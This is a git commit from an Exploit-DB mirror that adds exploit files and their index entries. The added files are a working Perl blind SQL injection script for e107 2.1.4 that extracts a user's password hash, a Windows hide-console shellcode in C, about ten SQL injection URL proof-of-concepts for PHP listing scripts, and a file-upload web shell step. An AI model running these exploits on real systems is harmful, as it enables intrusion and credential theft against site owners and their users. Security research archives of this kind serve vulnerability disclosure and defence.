DB: 2017-03-12
14 new exploits MobaXterm Personal Edition 9.4 - Directory Traversal Windows x86 - Hide Console Window Shellcode (182 bytes) e107 <= 2.1.4 - 'keyword' Blind SQL Injection Domain Marketplace Script - SQL Injection Global In - SQL Injection Global In - Arbitrary File Upload Vanelo - SQL Injection Mirage - SQL Injection Pet Listing Script 3.0 - SQL Injection Property Listing Script 3.1 - SQL Injection Travel Tours Script 2.0 - SQL Injection Yacht Listing Script 2.0 - SQL Injection Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection PHP Forum Script 3.0 - SQL Injection
This commit is contained in:
parent
f2327bc214
commit
d36dc6b95d
15 changed files with 736 additions and 0 deletions
14
files.csv
14
files.csv
|
@ -15313,6 +15313,7 @@ id,file,description,date,author,platform,type,port
|
|||
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
|
||||
41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
|
||||
41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
|
||||
41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -15938,6 +15939,7 @@ id,file,description,date,author,platform,type,port
|
|||
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -37493,3 +37495,15 @@ id,file,description,date,author,platform,type,port
|
|||
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
|
||||
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
|
||||
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
|
||||
41580,platforms/php/webapps/41580.pl,"e107 <= 2.1.4 - 'keyword' Blind SQL Injection",2017-03-09,StAkeR,php,webapps,0
|
||||
41582,platforms/php/webapps/41582.txt,"Domain Marketplace Script - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41583,platforms/php/webapps/41583.txt,"Global In - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41584,platforms/php/webapps/41584.txt,"Global In - Arbitrary File Upload",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41585,platforms/php/webapps/41585.txt,"Vanelo - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41593,platforms/php/webapps/41593.txt,"Mirage - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41586,platforms/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41587,platforms/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41588,platforms/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
265
platforms/php/webapps/41580.pl
Executable file
265
platforms/php/webapps/41580.pl
Executable file
|
@ -0,0 +1,265 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
#
|
||||
# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
|
||||
#
|
||||
# --------------------------------------------------------------------------
|
||||
# [*] Discovered by staker - staker[at]hotmail[dot]it
|
||||
# [*] Discovered on 09/03/2017
|
||||
# [*] Site Vendor: http://www.e107.org
|
||||
# [*] BUG: Blind SQL Injection
|
||||
# --------------------------------------------------------------------------
|
||||
#
|
||||
#
|
||||
# Description
|
||||
# -------------------------------------------------------------------------
|
||||
# e107 contains one flaw that allows an attacker to carry out an SQL
|
||||
# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script
|
||||
# not properly saniting user-supplied input to the "keyword" POST variable
|
||||
# This may allow an attacker to inject or manipulate sql queries in
|
||||
# the backend database regardless of php.ini settings
|
||||
# -------------------------------------------------------------------------
|
||||
# SHORT EXPLANATION
|
||||
# -----------------------------------
|
||||
#
|
||||
# FILE: "e107_handlers/core_functions.php"
|
||||
#
|
||||
# 76. function vartrue(&$val, $default='')
|
||||
# 77. {
|
||||
# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database
|
||||
# 79. return $default;
|
||||
# 80.}
|
||||
#
|
||||
# ----------------------------------
|
||||
#
|
||||
# FILE: "e107/e107_plugins/pm/pm.php"
|
||||
#
|
||||
#
|
||||
# 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
|
||||
# 36. {
|
||||
# 37. pm_user_lookup();
|
||||
# 38.}
|
||||
#
|
||||
#
|
||||
#
|
||||
# 615. function pm_user_lookup()
|
||||
# 616. {
|
||||
# 617. $sql = e107::getDb();
|
||||
# 618.
|
||||
# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized
|
||||
# 620. if($sql->gen($query))
|
||||
# 621. {
|
||||
# 622. echo '[';
|
||||
# 623 while($row = $sql->fetch())
|
||||
# 624. {
|
||||
# 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
|
||||
# 626. }
|
||||
# 627.
|
||||
# 628. echo implode(",",$u);
|
||||
# 629. echo ']';
|
||||
# -----------------------------------
|
||||
#
|
||||
#
|
||||
# use your brain..
|
||||
#
|
||||
# Greetz to: Warwolfz Crew,
|
||||
# meh, Dante90, SHADES MASTER and nexen
|
||||
#
|
||||
# -- 0gay --
|
||||
#
|
||||
# -----------------------------------
|
||||
# YOUR MOM IS NOT SAFE ANYMORE!!
|
||||
# CALL HER!!
|
||||
# -----------------------------------
|
||||
|
||||
|
||||
|
||||
use strict;
|
||||
use IO::Socket::INET;
|
||||
use LWP::UserAgent;
|
||||
|
||||
|
||||
|
||||
|
||||
my ($URL,$uid) = @ARGV;
|
||||
my @chars = (8..122);
|
||||
my ($i,$ord,$hash) = (1,undef,undef);
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if (@ARGV != 2) { usage(); }
|
||||
|
||||
|
||||
$URL = parse::URL($URL);
|
||||
|
||||
|
||||
syswrite (STDOUT,"[-] Crypted Password: ");
|
||||
|
||||
|
||||
for ($i=0;$i<=60;$i++)
|
||||
{
|
||||
|
||||
foreach $ord (@chars)
|
||||
{
|
||||
|
||||
if (e107::Query(sql($i,$ord),$URL) == 666 )
|
||||
{
|
||||
syswrite (STDOUT,chr($ord));
|
||||
$hash .= chr($ord);
|
||||
last;
|
||||
}
|
||||
if ($i == 2 and not defined $hash)
|
||||
{
|
||||
syswrite (STDOUT,"\n[-] Exploit Failed");
|
||||
exit;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
if (length($hash) == 60) {
|
||||
die "\[-]Exploit Successfully";
|
||||
}
|
||||
else {
|
||||
die "\n[-] Exploit Failed";
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
sub e107::Query
|
||||
{
|
||||
|
||||
# 1st parameter, sql query
|
||||
# 2nd parameter, e107 website
|
||||
|
||||
my ($query,$URL) = @_;
|
||||
my $response = undef;
|
||||
|
||||
my $lwp = new LWP::UserAgent;
|
||||
|
||||
|
||||
$lwp->default_header('User-Agent' => 'Lynx (textmode)');
|
||||
|
||||
$response = $lwp->post($URL."/pm/",
|
||||
[
|
||||
keyword => $query
|
||||
]) or die $!;
|
||||
|
||||
|
||||
if ($response->content =~ /caption/) {
|
||||
return 666;
|
||||
}
|
||||
else {
|
||||
return 0;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
sub parse::URL
|
||||
{
|
||||
my $string = shift @_ || die($!);
|
||||
|
||||
if ($string !~ /^http:\/\/?/i) {
|
||||
$string = 'http://'.$string;
|
||||
}
|
||||
|
||||
return $string;
|
||||
}
|
||||
|
||||
|
||||
|
||||
sub sql
|
||||
{
|
||||
|
||||
# 1st parameter, an e107's userid
|
||||
# 2nd parameter substring number
|
||||
# 3rd parameter charcode number
|
||||
|
||||
my ($i,$j,$sql) = (shift,shift,undef);
|
||||
|
||||
$sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";
|
||||
|
||||
return $sql;
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
sub e107::Cookies
|
||||
{
|
||||
|
||||
my ($username,$password) = @_;
|
||||
my ($packet,$content);
|
||||
|
||||
my $host = "127.0.0.1"; # Valid Host (insert it manually)
|
||||
my $path = "/e107/"; # Valid e107 path (insert it manually)
|
||||
|
||||
|
||||
my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In";
|
||||
|
||||
|
||||
my $socket = new IO::Socket::INET(
|
||||
PeerAddr => $host,
|
||||
PeerPort => 80,
|
||||
Proto => 'tcp',
|
||||
) or die $!;
|
||||
|
||||
|
||||
|
||||
$packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
|
||||
$packet .= "Host: ".$host."\r\n";
|
||||
$packet .= "User-Agent: Lynx (textmode)\r\n";
|
||||
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
$packet .= "Content-Length:".length($data)."\r\n";
|
||||
$packet .= "Connection: close\r\n\r\n";
|
||||
$packet.= $data;
|
||||
|
||||
|
||||
$socket->send($packet);
|
||||
|
||||
while (<$socket>) {
|
||||
$content .= $_;
|
||||
}
|
||||
|
||||
|
||||
if ($content =~ /Set-Cookie: (.+?)/) {
|
||||
return $1;
|
||||
}
|
||||
else {
|
||||
die("[-] Login Failed..\n");
|
||||
}
|
||||
|
||||
|
||||
# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
|
||||
# it works without log-in, but if you got some trouble, try to use this one.
|
||||
|
||||
# e107::Login('YOUR USERNAME','YOUR PASSWORD');
|
||||
}
|
||||
|
||||
|
||||
sub usage() {
|
||||
|
||||
print "[*---------------------------------------------------------*]\n".
|
||||
"[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n".
|
||||
"[*---------------------------------------------------------*]\n".
|
||||
"[* Usage: perl web.pl [host] [uid] *]\n".
|
||||
"[* *]\n".
|
||||
"[* Options: *]\n".
|
||||
"[* [host] insert a valid host *]\n".
|
||||
"[* [uid] insert a userid *]\n".
|
||||
"[*---------------------------------------------------------*]\n";
|
||||
exit;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
26
platforms/php/webapps/41582.txt
Executable file
26
platforms/php/webapps/41582.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: Domain Marketplace Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: http://scripteen.com/
|
||||
# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html
|
||||
# Demo: http://dwm.domainauctionsscript.com/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL]
|
||||
# users :userId
|
||||
# users :data
|
||||
# users :payment_date
|
||||
# users :expiration_date
|
||||
# users :username
|
||||
# users :password
|
||||
# users :nume
|
||||
# users :adresa
|
||||
# Etc..
|
||||
# # # # #
|
26
platforms/php/webapps/41583.txt
Executable file
26
platforms/php/webapps/41583.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: Global In – A LinkedIn Clone - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.techbizstudio.com/
|
||||
# Software: https://www.techbizstudio.com/product/linkedin-clone/
|
||||
# Demo: https://www.techbizstudio.com/demo/globalin/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL]
|
||||
# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user]
|
||||
# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user]
|
||||
# tb_admin :id
|
||||
# tb_admin :username
|
||||
# tb_admin :email
|
||||
# tb_admin :password
|
||||
# tb_admin :ip_address
|
||||
# tb_admin :is_active
|
||||
# Etc..
|
||||
# # # # #
|
21
platforms/php/webapps/41584.txt
Executable file
21
platforms/php/webapps/41584.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# # # # #
|
||||
# Exploit Title: Global In - Arbitrary File Upload
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.techbizstudio.com/
|
||||
# Software: https://www.techbizstudio.com/product/linkedin-clone/
|
||||
# Demo: https://www.techbizstudio.com/demo/globalin/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/dashboard
|
||||
# Upload Photo / File.php
|
||||
# http://localhost/[PATH]/post-images/1113330455_File.php
|
||||
# Etc..
|
||||
# # # # #
|
19
platforms/php/webapps/41585.txt
Executable file
19
platforms/php/webapps/41585.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Vanelo – Wanelo Clone - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.zoplay.com/
|
||||
# Software: https://www.zoplay.com/web/trending-marketplace-website/
|
||||
# Demo: http://wanelo.zoplay.com/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/shopby/IhsanSencan?q=[SQL]
|
||||
# Duplicate entry 'waneloclone
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41586.txt
Executable file
18
platforms/php/webapps/41586.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Pet Listing Script v3.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/pet-listing-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1
|
||||
# Version: 3.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&year_from=2017[SQL]&year_to=2017[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41587.txt
Executable file
18
platforms/php/webapps/41587.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Property Listing Script v3.1 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/property-listing-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1
|
||||
# Version: 3.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41588.txt
Executable file
18
platforms/php/webapps/41588.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Travel Tours Script v2.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/travel-tours-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1
|
||||
# Version: 2.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41589.txt
Executable file
18
platforms/php/webapps/41589.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Yacht Listing Script v2.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/yacht-listing-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1
|
||||
# Version: 2.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41590.txt
Executable file
18
platforms/php/webapps/41590.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Yellow Pages Script v3.2 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/yellow-pages-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1
|
||||
# Version: 3.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41591.txt
Executable file
18
platforms/php/webapps/41591.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: PHP Forum Script v3.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/php-forum-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1
|
||||
# Version: 3.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC
|
||||
# Etc..
|
||||
# # # # #
|
19
platforms/php/webapps/41593.txt
Executable file
19
platforms/php/webapps/41593.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Mirage – Fancy Clone - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.zoplay.com/
|
||||
# Software: https://www.zoplay.com/web/multi-vendor-clone-website/
|
||||
# Demo: http://fancyclone.zoplay.com/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/shopby/IhsanSencan?c=[SQL]
|
||||
# Duplicate entry 'fancyclone
|
||||
# Etc..
|
||||
# # # # #
|
113
platforms/win_x86/shellcode/41581.c
Executable file
113
platforms/win_x86/shellcode/41581.c
Executable file
|
@ -0,0 +1,113 @@
|
|||
/*
|
||||
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2017 Ege Balcı
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
|
||||
|
||||
|
||||
# Win32 - Hide Console Window Shellcode (182 BYTES)
|
||||
# Date: [11.03.2017]
|
||||
# Author: [Ege Balcı]
|
||||
# Tested on: [Win XP/Vista/7/8/8.1/10]
|
||||
|
||||
@egeblc
|
||||
|
||||
------------------------------------------------------------------
|
||||
|
||||
This shellcode will hide the console window...
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
|
||||
pushad ; Save all register to stack
|
||||
pushfd ; Save all flags to stack
|
||||
cld
|
||||
call Start
|
||||
%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project
|
||||
|
||||
Start:
|
||||
pop ebp ; Pop the address of SFHA
|
||||
|
||||
push 0x00000000 ; Push the byte 'user32' ,0,0
|
||||
push 0x00003233 ; ...
|
||||
push 0x72657375 ; ...
|
||||
push esp ; Push a pointer to the "user32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "user32" )
|
||||
add esp,0x0C ; Clear the stack
|
||||
|
||||
push 0xCE726E89 ; hash("user32.dll", "GetConsoleWindow")
|
||||
call ebp ; GetConsoleWindow();
|
||||
|
||||
push 0x00000000 ; 0
|
||||
push eax ; Console window handle
|
||||
push 0x6E2EEBC2 ; hash(User32.dll, ShowWindow)
|
||||
call ebp ; ShowWindow(HANDLE,SW_HIDE);
|
||||
|
||||
popfd ; Pop back all saved flags
|
||||
popad ; Pop back all saved registers
|
||||
ret ; Return
|
||||
|
||||
*/
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
unsigned char Shellcode[] = {
|
||||
0x60, 0x9c, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31,
|
||||
0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,
|
||||
0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c,
|
||||
0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57,
|
||||
0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48,
|
||||
0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3,
|
||||
0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf,
|
||||
0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d,
|
||||
0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c,
|
||||
0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89,
|
||||
0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f,
|
||||
0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x6a, 0x00, 0x68, 0x33, 0x32,
|
||||
0x00, 0x00, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0x68, 0x4c, 0x77, 0x26,
|
||||
0x07, 0xff, 0xd5, 0x83, 0xc4, 0x0c, 0x68, 0x89, 0x6e, 0x72, 0xce, 0xff,
|
||||
0xd5, 0x6a, 0x00, 0x50, 0x68, 0xc2, 0xeb, 0x2e, 0x6e, 0xff, 0xd5, 0x9d,
|
||||
0x61, 0xc3
|
||||
};
|
||||
|
||||
|
||||
|
||||
void ExecuteShellcode();
|
||||
|
||||
|
||||
int main(int argc, char const *argv[])
|
||||
{
|
||||
ExecuteShellcode();
|
||||
getchar();
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
void ExecuteShellcode(){
|
||||
